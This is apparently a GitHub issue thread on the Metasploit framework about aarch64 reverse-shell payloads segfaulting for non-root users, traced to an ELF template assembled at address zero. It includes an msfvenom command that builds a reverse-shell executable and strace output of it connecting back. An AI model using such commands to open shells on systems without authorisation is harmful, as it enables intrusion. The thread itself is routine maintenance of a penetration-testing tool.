linux/aarch64/shell_reverse_tcp: segment fault when run as normal user

[ssst0n3]

steps to reproduce:
1.generate reverse shell exploit by msfvenom:
msfvenom -a aarch64 --platform linux -p linux/aarch64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > reserver.aarch64

2.run it as normal user, you will see:

user@aarch64:~$ /reverse.aarch64 
Segmentation fault

---

What's more strange is that it works well when run it as root user

It works well when executed by root user:

root@aarch64:/# strace /reverse.aarch64 
execve("/reverse.aarch64", ["/reverse.aarch64"], 0xffffe9928730 /* 23 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(23333), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)
exit(0)                                 = ?
+++ exited with 0 +++

But segfault when executed by normal user:

root@aarch64:/# adduser user
root@aarch64:/# su - user
user@aarch64:~$ strace /reverse.aarch64 
execve("/reverse.aarch64", ["/reverse.aarch64"], 0xffffdf1a2a80 /* 17 vars */) = -1 EPERM (Operation not permitted)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SI_KERNEL, si_addr=NULL} ---
+++ killed by SIGSEGV +++
Segmentation fault (core dumped)

[ssst0n3]

It seems because of the elf template.

The elf template file is template_aarch64_linux.bin

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/exe.rb#L1183

  # self.to_linux_aarch64_elf
  #
  # @param framework [Msf::Framework]
  # @param code       [String]
  # @param opts       [Hash]
  # @option           [String] :template
  # @return           [String] Returns an elf
  def self.to_linux_aarch64_elf(framework, code, opts = {})
    to_exe_elf(framework, opts, "template_aarch64_linux.bin", code)
  end

This template file has same issue.

executed by root user, seems ok.

root@aarch64:/# gdb /template_aarch64_linux.bin 
(gdb) b *0x00000078
Breakpoint 1 at 0x78
(gdb) r
Starting program: /template_aarch64_linux.bin 

Breakpoint 1, 0x0000000000000078 in ?? ()
(gdb) s
Cannot find bounds of current function

executed by normal user, segment fault

user@aarch64:~$ gdb /template_aarch64_linux.bin 
(gdb) b *0x00000078
Breakpoint 1 at 0x78
(gdb) r
Starting program: /template_aarch64_linux.bin 
During startup program terminated with signal SIGSEGV, Segmentation fault.
(gdb) 

[ssst0n3]

This template file is located here:
8b4ccc6#diff-51d73d78dca4fe5c85d99b56fbed602710a873d0474cb48e9e6a21f7d1995a60

https://github.com/rapid7/metasploit-framework/blob/8b4ccc66c70c79be6376c929ea82553f7aca3657/data/templates/src/elf/exe/elf_aarch64_template.s

; build with:
;   nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin


BITS 64
org     0
ehdr:                            ; Elf32_Ehdr
  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
...

[ssst0n3]

Change the org to be 0x400000 may fix this issue

metasploit-framework/data/templates/src/elf/exe/elf_aarch64_template.s

Line 6 in 8b4ccc6

org 0

[ssst0n3]

Quick fix:

replace the org 0 with org 0x400000, rebuilt as template_aarch64_linux.bin, and then replace the msf file /usr/share/metasploit-framework/data/templates/template_aarch64_linux.bin

[ssst0n3]

try to fix it by #16569

[ssst0n3]

resubmit by #16570

[timwr]

Amazing. Does https://github.com/rapid7/metasploit-framework/pull/16570/files fix the issue for you?
We found this behaviour when adding the stager but couldn't figure out why: #8842

[ssst0n3]

Does https://github.com/rapid7/metasploit-framework/pull/16570/files fix the issue for you?

Yes, please merge it. @timwr

but couldn't figure out why

It appears to be a kernel policy. https://stackoverflow.com/questions/63790813/allocating-address-zero-on-linux-with-mmap-fails

[bcoles]

Does https://github.com/rapid7/metasploit-framework/pull/16570/files fix the issue for you?

Yes, please merge it. @timwr

but couldn't figure out why

It appears to be a kernel policy. https://stackoverflow.com/questions/63790813/allocating-address-zero-on-linux-with-mmap-fails

Thanks for this. NULL page has not been mappable in Linux for about a decade. I'm not sure why zero was used.

timwr will probably (?) be able to test and review this before I can. On the other hand, because the PR contains a compiled executable template, it may need to be merged be Rapid7 staff (not timwr or I).